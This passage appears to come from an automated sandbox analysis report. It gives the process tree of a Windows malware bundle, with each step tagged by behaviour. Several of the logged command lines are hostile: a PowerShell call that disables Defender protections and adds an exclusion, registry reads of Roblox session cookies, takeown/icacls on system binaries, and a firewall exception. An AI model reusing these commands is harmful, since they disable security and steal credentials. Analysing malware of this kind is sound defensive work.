                                                                                                                  PID:3192
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                  5⤵
                                                                                                                    PID:5624
                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                                    5⤵
                                                                                                                      PID:6916
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                      5⤵
                                                                                                                      • Drops startup file
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:7036
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                      5⤵
                                                                                                                        PID:3624
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im taskmgr.exe
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:6716
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\wimloader.dll
                                                                                                                    wimloader.dll
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:6796
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_4343f455-9e5f-4c17-b1d4-890d5e212f93\caller.cmd" "
                                                                                                                      4⤵
                                                                                                                        PID:4336
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\ac3.exe
                                                                                                                      ac3.exe
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                      PID:6476
                                                                                                                    • C:\Windows\SysWOW64\notepad.exe
                                                                                                                      "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\shell1.ps1"
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:6516
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping trustsentry.com -t -n 1 -s 4 -4
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:628
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping ya.ru -t -n 1 -s 4 -4
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:3792
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping tria.ge -t -n 1 -s 4 -4
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:6884
                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                      xcopy bloatware C:\Users\Admin\Desktop
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:4916
                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                      xcopy beastify.url C:\Users\Admin\Desktop
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:1008
                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                      xcopy shell1.ps1 C:\Users\Admin\Desktop
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:6148
                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                      takeown /R /F C:\Windows\explorer.exe
                                                                                                                      3⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:5128
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls c:\Windows\explorer.exe /grant Admin:(F)
                                                                                                                      3⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      • Modifies file permissions
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:6212
                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                      takeown /R /F C:\Windows\System32\dwm.exe
                                                                                                                      3⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      • Modifies file permissions
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:5708
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
                                                                                                                      3⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      • Modifies file permissions
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:6524
                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                      xcopy xcer.cer C:\Users\Admin\Desktop
                                                                                                                      3⤵
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:6684
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 15
                                                                                                                      3⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:6720
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 15
                                                                                                                      3⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:5116
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\freebobux.exe
                                                                                                                      freebobux.exe
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:6860
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6CCA.tmp\freebobux.bat""
                                                                                                                        4⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Modifies registry class
                                                                                                                        PID:3540
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6CCA.tmp\CLWCP.exe
                                                                                                                          clwcp c:\temp\bg.bmp
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Sets desktop wallpaper using registry
                                                                                                                          PID:6696
                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6CCA.tmp\x.vbs"
                                                                                                                          5⤵
                                                                                                                            PID:6896
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\SolaraBootstraper.exe
                                                                                                                        SolaraBootstraper.exe
                                                                                                                        3⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6864
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1008
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                          4⤵
                                                                                                                          • Drops file in Drivers directory
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5480
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            "wmic.exe" csproduct get uuid
                                                                                                                            5⤵
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5408
                                                                                                                          • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                            5⤵
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:6960
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                                                                            5⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5604
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                            5⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:412
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                            5⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:3356
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                            5⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:2156
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            "wmic.exe" os get Caption
                                                                                                                            5⤵
                                                                                                                              PID:7132
                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                              "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                              5⤵
                                                                                                                                PID:6740
                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                5⤵
                                                                                                                                  PID:3884
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                  5⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:6660
                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                  "wmic" path win32_VideoController get name
                                                                                                                                  5⤵
                                                                                                                                  • Detects videocard installed
                                                                                                                                  PID:7128
                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                                                                                  5⤵
                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                  PID:6536
                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                    ping localhost
                                                                                                                                    6⤵
                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:6368
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
                                                                                                                                4⤵
                                                                                                                                • Drops startup file
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                PID:5068
                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
                                                                                                                                  5⤵
                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:412
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im ctfmon.exe
                                                                                                                              3⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:7028
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\wim.dll
                                                                                                                              wim.dll
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:6896
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_b3c2c946-378f-424f-a357-0379e1f68b21\load.cmd" "
                                                                                                                                4⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:2760
                                                                                                                                • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                                                                                  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_b3c2c946-378f-424f-a357-0379e1f68b21\cringe.mp4"
                                                                                                                                  5⤵
                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:1472
                                                                                                                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_b3c2c946-378f-424f-a357-0379e1f68b21\lol.ini
                                                                                                                                  5⤵
                                                                                                                                    PID:5144
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\web2.htm
                                                                                                                                3⤵
                                                                                                                                  PID:6992
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ff856aa46f8,0x7ff856aa4708,0x7ff856aa4718
                                                                                                                                    4⤵
                                                                                                                                      PID:5232
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\xcer.cer
                                                                                                                                    3⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    PID:6668
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                    f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:1636
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                                                                                                                      4⤵
                                                                                                                                        PID:180
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff856aa46f8,0x7ff856aa4708,0x7ff856aa4718
                                                                                                                                          5⤵
                                                                                                                                            PID:7128
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                                                                                                          4⤵
                                                                                                                                            PID:5492
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ff856aa46f8,0x7ff856aa4708,0x7ff856aa4718
                                                                                                                                              5⤵
                                                                                                                                                PID:5012
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                                                                                              4⤵
                                                                                                                                                PID:1872
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff856aa46f8,0x7ff856aa4708,0x7ff856aa4718
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2312
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 15
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:6836
                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
                                                                                                                                                3⤵
                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                PID:1008
                                                                                                                                              • C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                regedit
                                                                                                                                                3⤵
                                                                                                                                                • Runs regedit.exe
                                                                                                                                                PID:860
                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                xcopy C:\Windows\WinSxS C:\Users\Admin\Desktop
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                PID:6204
                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                xcopy regmess.exe C:\Users\Admin\Desktop
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                PID:6192
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\jaffa.exe
                                                                                                                                                jaffa.exe
                                                                                                                                                3⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:4656
                                                                                                                                                • C:\Windows\SysWOW64\rcvigymldz.exe
                                                                                                                                                  rcvigymldz.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Modifies visibility of file extensions in Explorer
                                                                                                                                                  • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • Disables RegEdit via registry modification
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Windows security modification
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Modifies WinLogon
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:3944
                                                                                                                                                  • C:\Windows\SysWOW64\xqfdzcjq.exe
                                                                                                                                                    C:\Windows\system32\xqfdzcjq.exe
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    PID:3660
                                                                                                                                                • C:\Windows\SysWOW64\zvoesedlrcqzani.exe
                                                                                                                                                  zvoesedlrcqzani.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:1624
                                                                                                                                                • C:\Windows\SysWOW64\xqfdzcjq.exe
                                                                                                                                                  xqfdzcjq.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:3616
                                                                                                                                                • C:\Windows\SysWOW64\qayaqvombjuam.exe
                                                                                                                                                  qayaqvombjuam.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:3756
                                                                                                                                                • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                                                                                                                                                  4⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:4268
                                                                                                                                                  • C:\Windows\splwow64.exe
                                                                                                                                                    C:\Windows\splwow64.exe 12288
                                                                                                                                                    5⤵
                                                                                                                                                      PID:8124
                                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\helper.vbs"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3356
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\web3.htm
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6596
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff856aa46f8,0x7ff856aa4708,0x7ff856aa4718
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5160
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\jkka.exe
                                                                                                                                                        jkka.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:3328
                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                          "C:\Windows\system32\notepad.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Drops startup file
                                                                                                                                                          • NTFS ADS
                                                                                                                                                          PID:7040
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:1732
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Accesses Microsoft Outlook profiles
                                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              • outlook_office_path
                                                                                                                                                              • outlook_win_path
                                                                                                                                                              PID:1072
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 1072 240787171
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:7064
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im fontdrvhost.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:6220
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\selfaware.exe
                                                                                                                                                        selfaware.exe
                                                                                                                                                        3⤵
